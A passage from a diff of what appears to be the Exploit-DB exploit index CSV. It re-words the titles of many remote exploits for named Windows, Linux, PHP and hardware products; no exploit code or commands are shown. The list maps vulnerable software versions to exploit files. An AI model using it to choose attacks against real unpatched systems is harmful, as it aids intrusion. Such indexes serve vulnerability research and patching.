(Metasploit)",2010-06-15,Metasploit,remote,windows, 16488,exploits/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, 16489,exploits/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, @@ -11908,7 +11908,7 @@ id,file,description,date,author,type,platform,port 16771,exploits/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,remote,windows,8080 16772,exploits/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,remote,windows,80 16773,exploits/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,8028 -16774,exploits/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,remote,windows, +16774,exploits/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,remote,windows, 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows, 16776,exploits/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,remote,windows, 16777,exploits/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,remote,windows,80 @@ -11979,7 +11979,7 @@ id,file,description,date,author,type,platform,port 16844,exploits/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, 16845,exploits/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,remote,linux, 16846,exploits/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,remote,linux, -16847,exploits/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, +16847,exploits/linux/remote/16847.rb,"Squid - NTLM (Authenticated) Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, 16848,exploits/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,linux, 16849,exploits/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,linux, 16850,exploits/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, @@ -12064,7 +12064,7 @@ id,file,description,date,author,type,platform,port 17148,exploits/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)",2011-04-05,Metasploit,remote,multiple,10001 17149,exploits/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution (Metasploit)",2011-04-09,Metasploit,remote,windows, 17151,exploits/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow (Metasploit)",2011-04-04,Metasploit,remote,windows,25 -17152,exploits/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution (Metasploit)",2011-04-08,Metasploit,remote,windows,9090 +17152,exploits/windows/remote/17152.rb,"ManageEngine Applications Manager - (Authenticated) Code Execution (Metasploit)",2011-04-08,Metasploit,remote,windows,9090 17155,exploits/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution",2011-04-12,"Gerry Eisenhaur",remote,windows, 17156,exploits/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",remote,windows, 17175,exploits/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)",2011-04-16,Metasploit,remote,windows, @@ -12086,14 +12086,14 @@ id,file,description,date,author,type,platform,port 17345,exploits/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution",2011-05-29,fdiskyou,remote,windows, 17339,exploits/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution",2011-05-28,fdiskyou,remote,windows, 17352,exploits/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)",2011-05-30,Metasploit,remote,windows, -17354,exploits/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,remote,windows, +17354,exploits/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - (Authenticated) Buffer Overflow (2)",2011-06-01,b33f,remote,windows, 17355,exploits/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,remote,windows,21 17356,exploits/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution / Backdoor Access",2011-06-02,"Alex Stanev",remote,hardware, 17359,exploits/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,remote,windows, 17361,exploits/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous",remote,windows, 17365,exploits/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM",2011-06-07,"Jeremy Brown",remote,windows, 17366,exploits/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute (Metasploit)",2011-06-06,Metasploit,remote,windows, -17373,exploits/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,remote,windows, +17373,exploits/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,remote,windows, 17374,exploits/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow (Metasploit)",2011-06-09,Metasploit,remote,windows, 17381,exploits/windows/remote/17381.txt,"Simple Web Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",remote,windows, 17456,exploits/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - 'streamprocess.exe' Remote Buffer Overflow (Metasploit)",2011-06-27,Metasploit,remote,windows, @@ -12169,7 +12169,7 @@ id,file,description,date,author,type,platform,port 17855,exploits/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow (Metasploit)",2011-09-18,Metasploit,remote,windows, 17870,exploits/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow",2011-09-19,mr.pr0n,remote,windows, 17876,exploits/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,remote,windows, -17883,exploits/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,remote,hardware, +17883,exploits/hardware/remote/17883.txt,"Blue Coat Reporter - Directory Traversal",2011-09-22,nitr0us,remote,hardware, 17884,exploits/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,remote,windows, 17886,exploits/windows/remote/17886.py,"Freefloat FTP Server - Remote Buffer Overflow (DEP Bypass)",2011-09-23,blake,remote,windows, 17904,exploits/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,remote,windows, @@ -12225,7 +12225,7 @@ id,file,description,date,author,type,platform,port 18382,exploits/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",remote,windows, 18388,exploits/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,remote,windows, 18393,exploits/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution (Metasploit)",2012-01-20,Metasploit,remote,linux, -18397,exploits/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,remote,windows, +18397,exploits/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Command Execution",2012-01-20,Abysssec,remote,windows, 18401,exploits/windows/remote/18401.py,"Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)",2012-01-21,red-dragon,remote,windows, 18697,exploits/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Remote Buffer Overflow (Metasploit)",2012-04-04,Metasploit,remote,windows, 18420,exploits/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",remote,windows, @@ -12245,8 +12245,8 @@ id,file,description,date,author,type,platform,port 18514,exploits/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Remote Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,remote,windows, 18521,exploits/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,remote,windows, 18531,exploits/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow",2012-02-27,pa_kt,remote,windows, -18534,exploits/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",remote,windows, -18535,exploits/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",remote,windows, +18534,exploits/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP (Authenticated) (SEH)",2012-02-27,"Craig Freyman",remote,windows, +18535,exploits/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",remote,windows, 18538,exploits/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,remote,windows, 18539,exploits/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile (Metasploit)",2012-02-29,Metasploit,remote,windows, 18542,exploits/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server - Information Disclosure",2012-02-29,"SecPod Research",remote,windows, @@ -12276,7 +12276,7 @@ id,file,description,date,author,type,platform,port 18674,exploits/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,remote,windows, 18675,exploits/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,remote,hardware, 18679,exploits/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,remote,multiple, -18683,exploits/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow",2012-03-30,localh0t,remote,windows, +18683,exploits/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Remote Buffer Overflow",2012-03-30,localh0t,remote,windows, 18709,exploits/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)",2012-04-06,Metasploit,remote,windows, 18714,exploits/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,remote,windows, 18718,exploits/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,remote,windows, @@ -13505,7 +13505,7 @@ id,file,description,date,author,type,platform,port 22270,exploits/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,remote,windows, 22271,exploits/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,remote,hardware, 22274,exploits/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)",2003-02-23,CrZ,remote,linux, -22275,exploits/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing",2003-02-20,"Carl Livitt",remote,linux, +22275,exploits/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing",2003-02-20,"Carl Livitt",remote,linux, 22278,exploits/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",remote,linux, 22280,exploits/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,remote,windows, 22288,exploits/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 - Self Executing HTML File",2003-02-25,http-equiv,remote,windows, @@ -13709,7 +13709,7 @@ id,file,description,date,author,type,platform,port 23074,exploits/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level",2012-12-02,kingcope,remote,windows, 23079,exploits/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows, 23080,exploits/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows, -23081,exploits/multiple/remote/23081.pl,"MySQL - Unauthenticated Remote User Enumeration",2012-12-02,kingcope,remote,multiple, +23081,exploits/multiple/remote/23081.pl,"MySQL - Remote User Enumeration",2012-12-02,kingcope,remote,multiple, 23082,exploits/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass",2012-12-02,kingcope,remote,linux, 23083,exploits/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System",2012-12-02,kingcope,remote,windows, 23091,exploits/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",remote,windows, @@ -13827,9 +13827,9 @@ id,file,description,date,author,type,platform,port 23450,exploits/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",remote,windows, 23451,exploits/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",remote,windows, 23433,exploits/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,remote,multiple, -23435,exploits/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,remote,windows, -23436,exploits/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,remote,windows, -23437,exploits/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,remote,windows, +23435,exploits/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Buffer Overflow (1)",2003-12-16,Adik,remote,windows, +23436,exploits/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Buffer Overflow (2)",2003-12-16,kralor,remote,windows, +23437,exploits/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Buffer Overflow (3)",2003-12-16,kralor,remote,windows, 23439,exploits/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",remote,multiple, 23441,exploits/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",remote,linux, 23446,exploits/windows/remote/23446.txt,"GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure",2002-12-17,"Luigi Auriemma",remote,windows, @@ -13848,7 +13848,7 @@ id,file,description,date,author,type,platform,port 23503,exploits/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",remote,windows, 23509,exploits/windows/remote/23509.c,"YaSoft Switch Off 2.3 - 'swnet.dll' Remote Buffer Overflow",2004-01-02,MrNice,remote,windows, 23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",remote,windows, -23522,exploits/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",remote,multiple, +23522,exploits/multiple/remote/23522.rb,"NetWin SurgeFTP - (Authenticated) Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",remote,multiple, 23527,exploits/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware, 23528,exploits/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware, 23529,exploits/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,windows, @@ -13913,7 +13913,7 @@ id,file,description,date,author,type,platform,port 23732,exploits/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,remote,windows, 23733,exploits/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,remote,windows, 23734,exploits/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,remote,windows, -23735,exploits/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,remote,hardware, +23735,exploits/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution",2012-12-29,xistence,remote,hardware, 23736,exploits/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,remote,windows, 23737,exploits/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,remote,windows, 23740,exploits/linux/remote/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,remote,linux, @@ -14017,11 +14017,11 @@ id,file,description,date,author,type,platform,port 24161,exploits/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting",2004-06-01,"Oliver Karow",remote,windows, 24162,exploits/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting",2004-06-01,"Oliver Karow",remote,windows, 24163,exploits/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",remote,windows, -24165,exploits/linux/remote/24165.pl,"Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun",2004-06-01,wsxz,remote,linux, +24165,exploits/linux/remote/24165.pl,"Firebird 1.0 - Remote Database Name Buffer Overrun",2004-06-01,wsxz,remote,linux, 24174,exploits/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",remote,windows, 24179,exploits/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",remote,linux, 24196,exploits/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,remote,windows, -24205,exploits/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Command Execution",2013-01-18,"Gary Nilson",remote,linux, +24205,exploits/linux/remote/24205.txt,"Novell NCP - Remote Command Execution",2013-01-18,"Gary Nilson",remote,linux, 24230,exploits/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",remote,hardware, 24206,exploits/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",remote,multiple, 24213,exploits/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",remote,windows, @@ -14098,7 +14098,7 @@ id,file,description,date,author,type,platform,port 24529,exploits/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,remote,php, 24538,exploits/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,remote,windows, 24539,exploits/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,remote,multiple, -24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, +24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, 24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, 24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, 24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,remote,windows, @@ -14201,7 +14201,7 @@ id,file,description,date,author,type,platform,port 24984,exploits/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Remote Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, 24985,exploits/php/remote/24985.txt,"PHP 4/5 - 'addslashes()' Null Byte Bypass",2004-12-16,"Daniel Fabian",remote,php, 24995,exploits/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",remote,multiple, -24996,exploits/windows/remote/24996.rb,"SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",remote,windows, +24996,exploits/windows/remote/24996.rb,"SAP ConfigServlet - Remote Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",remote,windows, 25187,exploits/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",remote,windows, 25188,exploits/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure",2005-02-19,upken,remote,windows, 25190,exploits/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",remote,multiple, @@ -14253,7 +14253,7 @@ id,file,description,date,author,type,platform,port 25129,exploits/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",remote,windows, 25132,exploits/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",remote,multiple, 25133,exploits/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",remote,multiple, -25136,exploits/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)",2013-05-01,Metasploit,remote,php, +25136,exploits/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' (Authenticated) Remote Code Execution (Metasploit)",2013-05-01,Metasploit,remote,php, 25137,exploits/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,remote,php, 25144,exploits/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,remote,windows, 25146,exploits/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 - jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",remote,windows, @@ -14463,7 +14463,7 @@ id,file,description,date,author,type,platform,port 27244,exploits/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,remote,linux, 27271,exploits/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",remote,windows, 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows, -27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,remote,hardware, +27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Remote Command Execution (Metasploit)",2013-08-12,Metasploit,remote,hardware, 27293,exploits/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443 27294,exploits/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443 27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443 @@ -14474,7 +14474,7 @@ id,file,description,date,author,type,platform,port 27397,exploits/linux/remote/27397.txt,"Apache suEXEC - Information Disclosure / Privilege Escalation",2013-08-07,kingcope,remote,linux, 27400,exploits/windows/remote/27400.py,"HP Data Protector - Remote Command Execution",2013-08-07,"Alessandro Di Pinto & Claudio Moletta",remote,windows, 27401,exploits/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval",2013-08-07,Wireghoul,remote,windows, -27428,exploits/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,remote,hardware, +27428,exploits/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Remote Command Execution (Metasploit)",2013-08-08,Metasploit,remote,hardware, 27429,exploits/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,remote,windows, 27452,exploits/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",remote,hardware, 27508,exploits/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,remote,php, @@ -14503,7 +14503,7 @@ id,file,description,date,author,type,platform,port 27630,exploits/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,remote,linux, 27636,exploits/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - 'ads-readerext?actionID' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",remote,multiple, 27637,exploits/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - 'AlterCast?op' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",remote,multiple, -28056,exploits/hardware/remote/28056.txt,"MikroTik RouterOS - sshd (ROSSSH) Unauthenticated Remote Heap Corruption",2013-09-03,kingcope,remote,hardware, +28056,exploits/hardware/remote/28056.txt,"MikroTik RouterOS - sshd (ROSSSH) Remote Heap Corruption",2013-09-03,kingcope,remote,hardware, 27703,exploits/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow",2013-08-19,Polunchis,remote,windows, 27704,exploits/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,remote,windows, 27705,exploits/multiple/remote/27705.rb,"Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,remote,multiple, @@ -14602,7 +14602,7 @@ id,file,description,date,author,type,platform,port 28489,exploits/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",remote,windows, 28500,exploits/windows/remote/28500.txt,"Microsoft Indexing Service - Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",remote,windows, 28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,remote,multiple, -28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware, +28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware, 28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows, 28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPd Directory Traversal",2006-09-16,bug-finder,remote,linux, 28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",remote,multiple, @@ -14662,13 +14662,13 @@ id,file,description,date,author,type,platform,port 29290,exploits/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - 